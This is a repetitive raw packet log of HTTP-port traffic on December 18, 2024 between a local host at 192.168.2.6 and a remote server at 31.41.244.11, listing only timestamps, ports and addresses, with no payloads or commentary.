                                                                                                                                                                  Dec 18, 2024 11:09:29.676110983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.676543951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.676585913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.676738977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.676779985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.677839041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.677884102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.678009987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.678050995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.678169966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.678180933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.678215981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.678780079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.678822994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.678949118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.678987980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.679713011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.679733992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.679766893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.679792881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.680723906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.680793047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.680828094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.680869102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.681660891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.681704044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.681746006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.681782961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.682663918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.682713985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.682832003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.682874918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.683631897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.683681965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.683706999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.683754921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.684623957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.684659958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.684725046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.684779882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.685569048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.685615063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.685651064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.685689926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.690560102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.690618038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.690660954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.690709114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.691032887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.691075087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.691116095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.691158056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.692152977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.692190886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.692256927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.692296982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.693017006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.693062067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.693133116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.693167925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.693990946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.694031000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.694045067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.694086075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.696480036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.696522951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.697485924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.697529078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.698384047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.698394060 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.698405027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.698415995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.698425055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.698463917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.698733091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.698776007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.698842049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.698879957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.699812889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.699853897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.699960947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.699996948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.700812101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.700855970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.700953007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.700987101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.701837063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.701848984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.701884031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.702723980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.702769041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.702883005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.702919960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.703705072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.703716040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.703749895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.704780102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.704823971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.704927921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.704968929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.705657005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.705668926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.705705881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.706675053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.706716061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.706825972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.706872940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.707529068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.707566977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.707667112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.707700968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.708784103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.708823919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.708965063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.709017992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.709635973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.709654093 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.709673882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.709690094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.710606098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.710617065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.710649014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.710668087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.711560965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.711572886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.711604118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.712512970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.712523937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.712555885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.713505983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.713547945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.713628054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.713666916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.714432955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.714478970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.714581013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.714621067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.715472937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.715526104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.715607882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.715645075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.716583014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.716594934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.716623068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.716639996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.717533112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.717546940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.717577934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.717597008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.718434095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.718477964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.718575954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.718616962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.719290972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.719330072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.719418049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.719470978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.720354080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.720398903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.720623970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.720664024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.721288919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.721327066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.721468925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.721507072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.722275972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.722315073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.722408056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.722448111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.723562956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.723579884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.723606110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.723624945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.724338055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.724350929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.724378109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.724395037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.725343943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.725359917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.725388050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.725402117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.725799084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.725821018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.725841045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.725853920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.727236986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.727288008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.727364063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.727402925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.728367090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.728410006 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.728468895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.728507042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.729262114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.729274035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.729300976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.729317904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.864820004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.864837885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.864872932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.864900112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.865379095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.865416050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.865618944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.865664005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.866344929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.866358042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.866384983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.866403103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.867449999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.867503881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.867590904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.867635965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.868125916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.868169069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.868330002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.868371010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.869157076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.869204998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.869417906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.869457960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.870362043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.870373964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.870402098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.870419979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.871062040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.871102095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.871215105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.871253014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.872740984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.872755051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.872783899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.872797966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.873295069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.873342037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.873486996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.873522997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.873996973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.874034882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.874083042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.874119997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.875179052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.875216007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.875370026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.875427961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.876202106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.876224995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.876240015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.876259089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.876924038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.876962900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.881907940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.881952047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.881980896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.882018089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.882343054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.882381916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.882409096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.882446051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.883444071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.883486032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.883583069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.883620977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.884346962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.884387970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.884401083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.884433985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.885278940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.885322094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.885366917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.885402918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.886255026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.886296988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.886451006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.886487961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.887209892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.887249947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.887327909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.887367964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.888192892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.888233900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.888298035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.888334036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.889188051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.889226913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.889285088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.889321089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.890201092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.890240908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.890279055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.890315056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.891169071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.891206980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.891243935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.891280890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.893642902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.893661022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.893673897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.893686056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.893692970 CET4991280192.168.2.631.41.244.11
